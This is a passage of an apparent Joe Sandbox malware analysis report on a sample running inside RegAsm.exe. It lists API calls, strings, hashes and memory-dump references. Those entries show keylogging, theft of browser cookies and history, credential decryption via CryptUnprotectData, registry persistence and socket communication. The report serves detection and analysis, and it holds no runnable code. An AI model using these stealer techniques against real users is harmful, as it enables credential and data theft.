                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 2812119850-3972193922
                                                                                                                                                                      • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                      • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                      • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                                        • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02234948,00000010), ref: 004048E0
                                                                                                                                                                        • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                      • String ID: XQG$NG$PG
                                                                                                                                                                      • API String ID: 1634807452-3565412412
                                                                                                                                                                      • Opcode ID: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                                                      • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 24d1b81352f2547fa77c554ed12819fcaf45bb034c36d1f1b2d86084d4bb2f97
                                                                                                                                                                      • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                      • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                      • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                      • API String ID: 2506810119-1068371695
                                                                                                                                                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                                                                                      • _free.LIBCMT ref: 004435E0
                                                                                                                                                                      • _free.LIBCMT ref: 004435EA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                      • API String ID: 2506810119-1068371695
                                                                                                                                                                      • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                      • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                      • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                      • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                        • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,639B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                        • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                      • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                      • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                      • API String ID: 368326130-3219657780
                                                                                                                                                                      • Opcode ID: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                                                                                                      • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                                      • Opcode Fuzzy Hash: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                                                      APIs
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                                        • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                        • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                        • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                                                                                        • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                      • String ID: !D@$okmode$PG
                                                                                                                                                                      • API String ID: 3411444782-3370592832
                                                                                                                                                                      • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                                                      • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                                                      • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                                                                      Strings
                                                                                                                                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                                      • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                      • API String ID: 1174141254-1980882731
                                                                                                                                                                      • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                      • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                                      • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                                                                      Strings
                                                                                                                                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                                      • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                      • API String ID: 1174141254-1980882731
                                                                                                                                                                      • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                      • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                                      • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                      • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventLocalTimewsprintf
                                                                                                                                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                      • API String ID: 1497725170-1359877963
                                                                                                                                                                      • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                      • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                                      • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                      • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                      • String ID: Online Keylogger Started
                                                                                                                                                                      • API String ID: 112202259-1258561607
                                                                                                                                                                      • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                      • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                      • API String ID: 2574300362-2380590389
                                                                                                                                                                      • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                      • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                      • String ID: Connection Timeout
                                                                                                                                                                      • API String ID: 2055531096-499159329
                                                                                                                                                                      • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                      • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                                                                                      • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2005118841-1866435925
                                                                                                                                                                      • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                      • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                                                                                                      • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                                                                                                      • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                                                                                                      • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                                                                                                      • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                      • String ID: pth_unenc
                                                                                                                                                                      • API String ID: 1818849710-4028850238
                                                                                                                                                                      • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                      • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                                                                                        • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                                                                                        • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 3628047217-1405518554
                                                                                                                                                                      • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                      • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                                                                                                      • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeHandleLibraryModule
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 662261464-1276376045
                                                                                                                                                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                                                                                      • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                                                                                      • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                                                                                        • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                        • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                        • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                        • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                      • API String ID: 186401046-604454484
                                                                                                                                                                      • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
